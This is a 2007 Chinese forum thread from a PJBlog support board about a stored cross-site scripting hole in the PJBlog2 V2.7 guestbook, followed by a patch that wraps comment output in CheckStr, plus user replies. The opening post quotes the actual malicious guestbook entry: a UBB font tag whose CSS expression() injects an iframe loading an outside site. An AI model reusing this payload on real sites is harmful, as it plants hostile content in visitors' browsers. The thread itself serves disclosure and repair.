官方首页 | 无图版 | BBS首页
PJBlog2最新版本下载|升级包(2007.12.23) Bo-Blog V2.1.0 到 PJBlog 2.7 的转换程序 WP 2.3 到 PJ 2.6/2.7 的转换程序 手把手教您在PJForum上传图片
PJBlog技术支持论坛使用问题总索引 手术式讲解视频教程如何制作 PJblog2.7.05终极资源包电驴免费下载 风格使用区-HOT! 凤凰行动开始!
 22 123
发新话题
打印

PJBLOG2 V2.7 build 04 留言本漏洞 修正方法(2007年6月1日22时更新)

本主题由 thomas 于 2007-7-27 10:44 移动

PJBLOG2 V2.7 build 04 留言本漏洞 修正方法(2007年6月1日22时更新)

昨天,进留言,结果发现变成了框架的,在后台看见这样一条留言,删除了,今天又有了,郁闷,现在已经关闭了留言本了,等待解决方法
复制内容到剪贴板
代码:
[font=expression(container.document.write(unescape('%3Ciframe%20src%3D%27http%3A//www.wc444.cn%27%3E%3C/iframe%3E')))]嘴嘴[/font]
游客86111 [2007-06-01 13:42:23 | 125.76.164.89]


==================================================


修正方法:

如果不用屏蔽关键字的办法。则使用下面的办法修补漏洞

打开 guestbook.asp 搜索
复制内容到剪贴板
代码:
<%=UBBCode(HtmlEncode(GuestDB("book_Content")),0,GBSet.getKeyValue("ubbCode"),GBSet.getKeyValue("ImgCode"),GBSet.getKeyValue("autoURL"),1)%>
改为
复制内容到剪贴板
代码:
<%=CheckStr(UBBCode(HtmlEncode(GuestDB("book_Content")),0,GBSet.getKeyValue("ubbCode"),GBSet.getKeyValue("ImgCode"),GBSet.getKeyValue("autoURL"),1))%>
打开 cls_article.asp 搜索
复制内容到剪贴板
代码:
<%=UBBCode(HtmlEncode(blog_CommContent),commArr(4,Pcount),blog_commUBB,blog_commIMG,commArr(7,Pcount),commArr(9,Pcount))%>
改为
复制内容到剪贴板
代码:
<%=CheckStr(UBBCode(HtmlEncode(blog_CommContent),commArr(4,Pcount),blog_commUBB,blog_commIMG,commArr(7,Pcount),commArr(9,Pcount)))%>
感谢 星玄宇 版主提供暂时的解决方法,谨代表PJFANS向他表示感谢!

TOP

我刚刚试了,不会的.
留言中包含被屏蔽的字符

TOP

屏蔽字符,在哪设置呀?

TOP

暂时解决办法,关闭UBB

TOP

严重支持!!!

TOP

留言中包含被屏蔽的字符

这个问题我也发现了,苦恼啊~~

TOP

在SPAN.XML里面的存储被屏蔽的关键字,可是在网站上还是会出现,程序问题?

TOP

呵呵,

TOP

屏蔽了 还不行?
我的博客:http://www.onechen.com
我的Idc:迈腾空间代理 It's AD!

TOP

速度真快,呵呵 ,支持哦

TOP

 22 123
发新话题